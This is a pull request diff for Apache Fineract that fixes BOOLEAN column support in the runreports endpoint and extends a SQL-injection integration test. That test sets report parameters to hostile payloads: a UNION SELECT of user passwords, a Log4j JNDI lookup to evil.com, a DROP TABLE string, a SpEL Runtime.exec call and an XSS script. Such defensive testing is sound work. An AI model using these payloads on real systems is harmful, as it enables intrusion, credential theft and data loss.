Merge pull request #5637

FINERACT-2535: Data type 'BOOLEAN' is not supported in runreports endpoint

Author: adamsaghy

.github/workflows/build-documentation.yml

@@ -23,13 +23,13 @@ jobs:
       - uses: actions/setup-node@53b83947a5a98c8d113130e565377fae1a50d02f # v6
         with:
           node-version: 22
-      - name: Congfigure vega-cli
+      - name: Configure vega-cli
         run: npm i -g vega-cli --unsafe
       - name: Validate Gradle wrapper
         uses: gradle/actions/wrapper-validation@0723195856401067f7a2779048b490ace7a47d7c # v5.0.2
       - name: Install additional software
         run: |
-            sudo apt-get update
-            sudo apt-get install ghostscript graphviz -y
+          sudo apt-get update
+          sudo apt-get install ghostscript graphviz -y
       - name: Documentation build
         run: ./gradlew --no-daemon --console=plain doc

fineract-core/src/main/java/org/apache/fineract/infrastructure/core/service/database/JdbcJavaType.java

@@ -34,7 +34,7 @@ public Object toJdbcValueImpl(@NonNull DatabaseType dialect, Object value) {
             return value == null ? null : (Boolean.TRUE.equals(value) ? 1 : 0);
         }
     },
-    BOOLEAN(JavaType.BOOLEAN, new DialectType(JDBCType.BIT), new DialectType(JDBCType.BOOLEAN, null, "BOOL")) { //
+    BOOLEAN(JavaType.BOOLEAN, new DialectType(JDBCType.BIT, null, "BOOL", "BOOLEAN"), new DialectType(JDBCType.BOOLEAN, null, "BOOL")) { //
 
         @Override
         public Object toJdbcValueImpl(@NonNull DatabaseType dialect, Object value) {

fineract-core/src/test/java/org/apache/fineract/infrastructure/core/service/database/JdbcJavaTypeTest.java

@@ -0,0 +1,44 @@
+/**
+ * Licensed to the Apache Software Foundation (ASF) under one
+ * or more contributor license agreements. See the NOTICE file
+ * distributed with this work for additional information
+ * regarding copyright ownership. The ASF licenses this file
+ * to you under the Apache License, Version 2.0 (the
+ * "License"); you may not use this file except in compliance
+ * with the License. You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing,
+ * software distributed under the License is distributed on an
+ * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ * KIND, either express or implied. See the License for the
+ * specific language governing permissions and limitations
+ * under the License.
+ */
+package org.apache.fineract.infrastructure.core.service.database;
+
+import static org.junit.jupiter.api.Assertions.assertEquals;
+
+import org.junit.jupiter.api.Test;
+
+class JdbcJavaTypeTest {
+
+    @Test
+    void shouldResolveBooleanTypeNameForMySql() {
+        JdbcJavaType jdbcJavaType = JdbcJavaType.getByTypeName(DatabaseType.MYSQL, "BOOLEAN", true);
+        assertEquals(JdbcJavaType.BOOLEAN, jdbcJavaType);
+    }
+
+    @Test
+    void shouldResolveBoolTypeNameForMySql() {
+        JdbcJavaType jdbcJavaType = JdbcJavaType.getByTypeName(DatabaseType.MYSQL, "BOOL", true);
+        assertEquals(JdbcJavaType.BOOLEAN, jdbcJavaType);
+    }
+
+    @Test
+    void shouldResolveBitTypeNameForMySql() {
+        JdbcJavaType jdbcJavaType = JdbcJavaType.getByTypeName(DatabaseType.MYSQL, "BIT", true);
+        assertEquals(JdbcJavaType.BOOLEAN, jdbcJavaType);
+    }
+}

integration-tests/src/test/java/org/apache/fineract/integrationtests/SqlInjectionReportingServiceIntegrationTest.java

@@ -35,6 +35,7 @@
 import java.nio.charset.StandardCharsets;
 import java.util.HashMap;
 import java.util.List;
+import java.util.Locale;
 import java.util.Map;
 import java.util.concurrent.Callable;
 import java.util.concurrent.ExecutionException;
@@ -66,18 +67,29 @@ public class SqlInjectionReportingServiceIntegrationTest extends BaseLoanIntegra
 
     private RequestSpecification requestSpec;
     private ResponseSpecification responseSpec;
+    private ResponseSpecification createOrReadResponseSpec;
     private Long testReportId = null;
+    private Long booleanReportId = null;
     private static final String TEST_REPORT_NAME = "SQL_Injection_Test_Report";
     private static final String TEST_REPORT_SQL = "SELECT 1 as test_column, 'Test Data' as test_name";
+    private static final String BOOLEAN_REPORT_SQL = "SELECT (1 = 1) AS active";
+    private String booleanReportName;
 
     @BeforeEach
     public void setup() {
+        Locale.setDefault(Locale.ENGLISH);
         Utils.initializeRESTAssured();
         this.requestSpec = new RequestSpecBuilder().setContentType(ContentType.JSON).build();
         this.requestSpec.header("Authorization", "Basic " + Utils.loginIntoServerAndGetBase64EncodedAuthenticationKey());
         this.requestSpec.header("Fineract-Platform-TenantId", "default");
+
+        // Keep strict 200 for runreports GET assertions used in tests
         this.responseSpec = new ResponseSpecBuilder().expectStatusCode(200).build();
 
+        // Creation endpoints may return 201 in some environments
+        this.createOrReadResponseSpec = new ResponseSpecBuilder()
+                .expectStatusCode(org.hamcrest.Matchers.anyOf(org.hamcrest.Matchers.is(200), org.hamcrest.Matchers.is(201))).build();
+
         // Create test report for the tests
         createTestReportIfNotExists();
     }
@@ -89,7 +101,19 @@ public void cleanup() {
             try {
                 deleteTestReport();
             } catch (Exception e) {
-                log.warn("Failed to clean up test report: " + e.getMessage());
+                log.warn("Failed to clean up test report: {}", e.getMessage());
+            } finally {
+                testReportId = null;
+            }
+        }
+        if (booleanReportId != null) {
+            try {
+                deleteBooleanReport();
+            } catch (Exception e) {
+                log.warn("Failed to clean up boolean test report: {}", e.getMessage());
+            } finally {
+                booleanReportId = null;
+                booleanReportName = null;
             }
         }
     }
@@ -125,7 +149,6 @@ private void createTestReportIfNotExists() {
         } catch (Exception e) {
             log.debug("Report list fetch failed, will try to create report: {}", e.getMessage());
         }
-
         // Create the test report
         String reportJson = "{" + "\"reportName\": \"" + TEST_REPORT_NAME + "\"," + "\"reportType\": \"Table\","
                 + "\"reportCategory\": \"Client\"," + "\"reportSql\": \"" + TEST_REPORT_SQL + "\","
@@ -161,14 +184,60 @@ private void createTestReportIfNotExists() {
         }
     }
 
-    private void deleteTestReport() {
-        if (testReportId != null) {
-            try {
-                Utils.performServerDelete(requestSpec, responseSpec, "/fineract-provider/api/v1/reports/" + testReportId, "");
-                log.info("Deleted test report with ID: {}", testReportId);
-            } catch (Exception e) {
-                log.warn("Failed to delete test report: " + e.getMessage());
+    private void createBooleanReport() {
+        booleanReportName = "BOOLEAN_Runreports_Test_Report_" + java.util.UUID.randomUUID();
+
+        String reportJson = "{" + "\"reportName\": \"" + booleanReportName + "\"," + "\"reportType\": \"Table\","
+                + "\"reportCategory\": \"Client\"," + "\"reportSql\": \"" + BOOLEAN_REPORT_SQL + "\","
+                + "\"description\": \"Test report for BOOLEAN runreports support\"," + "\"useReport\": true" + "}";
+
+        Response postResponse = given().spec(requestSpec).contentType(ContentType.JSON).body(reportJson).when()
+                .post("/fineract-provider/api/v1/reports");
+
+        if (postResponse.getStatusCode() == 200 || postResponse.getStatusCode() == 201) {
+            String response = postResponse.asString();
+            if (response.contains("resourceId")) {
+                String idStr = response.replaceAll(".*\"resourceId\":(\\d+).*", "$1");
+                booleanReportId = Long.parseLong(idStr);
+                log.info("Created BOOLEAN test report with ID: {}, name: {}", booleanReportId, booleanReportName);
+            } else {
+                throw new RuntimeException("BOOLEAN test report creation failed - no resourceId in response: " + response);
             }
+        } else {
+            throw new RuntimeException(
+                    "BOOLEAN test report creation failed with status " + postResponse.getStatusCode() + ": " + postResponse.asString());
+        }
+    }
+
+    private void deleteTestReport() {
+        if (testReportId == null) {
+            return;
+        }
+
+        Response deleteResponse = given().spec(requestSpec).contentType(ContentType.JSON).when()
+                .delete("/fineract-provider/api/v1/reports/" + testReportId);
+
+        if (deleteResponse.getStatusCode() == 200 || deleteResponse.getStatusCode() == 204 || deleteResponse.getStatusCode() == 404) {
+            log.info("Deleted (or already absent) test report with ID: {}", testReportId);
+        } else {
+            throw new RuntimeException("Failed deleting test report with ID " + testReportId + ", status: " + deleteResponse.getStatusCode()
+                    + ", body: " + deleteResponse.asString());
+        }
+    }
+
+    private void deleteBooleanReport() {
+        if (booleanReportId == null) {
+            return;
+        }
+
+        Response deleteResponse = given().spec(requestSpec).contentType(ContentType.JSON).when()
+                .delete("/fineract-provider/api/v1/reports/" + booleanReportId);
+
+        if (deleteResponse.getStatusCode() == 200 || deleteResponse.getStatusCode() == 204 || deleteResponse.getStatusCode() == 404) {
+            log.info("Deleted (or already absent) BOOLEAN test report with ID: {}", booleanReportId);
+        } else {
+            throw new RuntimeException("Failed deleting BOOLEAN test report with ID " + booleanReportId + ", status: "
+                    + deleteResponse.getStatusCode() + ", body: " + deleteResponse.asString());
         }
     }
 
@@ -215,7 +284,7 @@ void uc2_testParameterInjectionPrevention() {
         // This should either succeed with empty/safe results or fail with validation error
         // but NOT with SQL syntax errors
         try {
-            String response = Utils.performServerGet(requestSpec, responseSpec, "/fineract-provider/api/v1/runreports/" + TEST_REPORT_NAME
+            Utils.performServerGet(requestSpec, responseSpec, "/fineract-provider/api/v1/runreports/" + TEST_REPORT_NAME
                     + "?genericResultSet=false&" + toQueryString(maliciousParams), null);
 
             // If we get here, the SQL injection was prevented and handled safely
@@ -227,7 +296,6 @@ void uc2_testParameterInjectionPrevention() {
                     "Should not get SQL syntax error, got: " + exception.getMessage());
             assertFalse(exception.getMessage().toLowerCase().contains("you have an error in your sql"),
                     "Should not get SQL error, got: " + exception.getMessage());
-
             // Should be a validation error, not a 404
             assertFalse(exception.getMessage().contains("404"), "Should not get 404 - report should exist. Got: " + exception.getMessage());
 
@@ -249,7 +317,7 @@ void uc3_testValidReportTypes(String validType) {
 
         // Test that valid report types work through the API
         try {
-            String response = Utils.performServerGet(requestSpec, responseSpec,
+            Utils.performServerGet(requestSpec, responseSpec,
                     "/runreports/TestReport?reportType=" + validType + "&genericResultSet=false&" + toQueryString(queryParams), null);
             // Should get a proper response or 404 (report not found), not validation error
         } catch (AssertionError e) {
@@ -414,10 +482,10 @@ void uc8_testComplexParameterInjection() {
         // Test various parameter injection patterns that were historically problematic
         Map<String, String> maliciousParams = new HashMap<>();
         maliciousParams.put("R_officeId", "1) UNION SELECT username,password FROM m_appuser WHERE id=1--");
-        maliciousParams.put("R_clientId", "${jndi:ldap://evil.com/a}"); // Log4j style injection
+        maliciousParams.put("R_clientId", "${jndi:ldap://evil.com/a}");
         maliciousParams.put("R_startDate", "'; DROP TABLE IF EXISTS test; --");
-        maliciousParams.put("R_endDate", "#{T(java.lang.Runtime).getRuntime().exec('whoami')}"); // SpEL injection
-        maliciousParams.put("R_userId", "<script>alert('xss')</script>"); // XSS attempt in parameter
+        maliciousParams.put("R_endDate", "#{T(java.lang.Runtime).getRuntime().exec('whoami')}");
+        maliciousParams.put("R_userId", "<script>alert('xss')</script>");
 
         try {
             Utils.performServerGet(requestSpec, responseSpec, "/fineract-provider/api/v1/runreports/" + TEST_REPORT_NAME
@@ -487,18 +555,40 @@ void uc10_testCrossDatabaseCompatibility() {
             Utils.performServerGet(requestSpec, responseSpec, "/fineract-provider/api/v1/runreports/"
                     + URLEncoder.encode(testInput, StandardCharsets.UTF_8) + "?genericResultSet=false&" + toQueryString(queryParams), null);
         } catch (AssertionError e) {
-            // Should get 404 (report not found) not database-specific errors
-            assertTrue(e.getMessage().contains("404"));
+            assertTrue(e.getMessage().contains("404") || e.getMessage().contains("400"),
+                    "Expected safe failure (404/400), but got: " + e.getMessage());
             assertFalse(e.getMessage().toLowerCase().contains("syntax error"));
             assertFalse(e.getMessage().toLowerCase().contains("sql"));
 
-            log.info("Cross-database compatibility test passed - got expected 404 response");
+            log.info("Cross-database compatibility test passed - got expected safe response");
         }
     }
 
     /**
      * Helper method to convert parameters map to query string
      */
+    @Test
+    void shouldExecuteReportSuccessfullyWhenReportContainsBooleanColumn() {
+        createBooleanReport();
+        assertNotNull(booleanReportId, "BOOLEAN test report should be created before execution");
+        assertNotNull(booleanReportName, "BOOLEAN test report name should be initialized");
+
+        // Use direct request to avoid hidden auth mismatch and assert exact behavior
+        Response runResponse = given().spec(requestSpec).accept(ContentType.JSON).when().get("/fineract-provider/api/v1/runreports/"
+                + URLEncoder.encode(booleanReportName, StandardCharsets.UTF_8) + "?genericResultSet=false");
+
+        String response = runResponse.asString();
+        assertTrue(runResponse.getStatusCode() == 200, "Expected status 200 but was " + runResponse.getStatusCode() + " body: " + response);
+
+        assertNotNull(response);
+        assertFalse(response.isBlank());
+        assertFalse(response.contains("Data type 'BOOLEAN' is not supported"));
+        assertTrue(response.toLowerCase().contains("active"),
+                "Response should contain boolean column alias 'active', but was: " + response);
+        assertTrue(response.toLowerCase().contains("true") || response.toLowerCase().contains("1"),
+                "Response should contain boolean value (true/1), but was: " + response);
+    }
+
     private String toQueryString(Map<String, String> params) {
         StringBuilder sb = new StringBuilder();
         for (Map.Entry<String, String> entry : params.entrySet()) {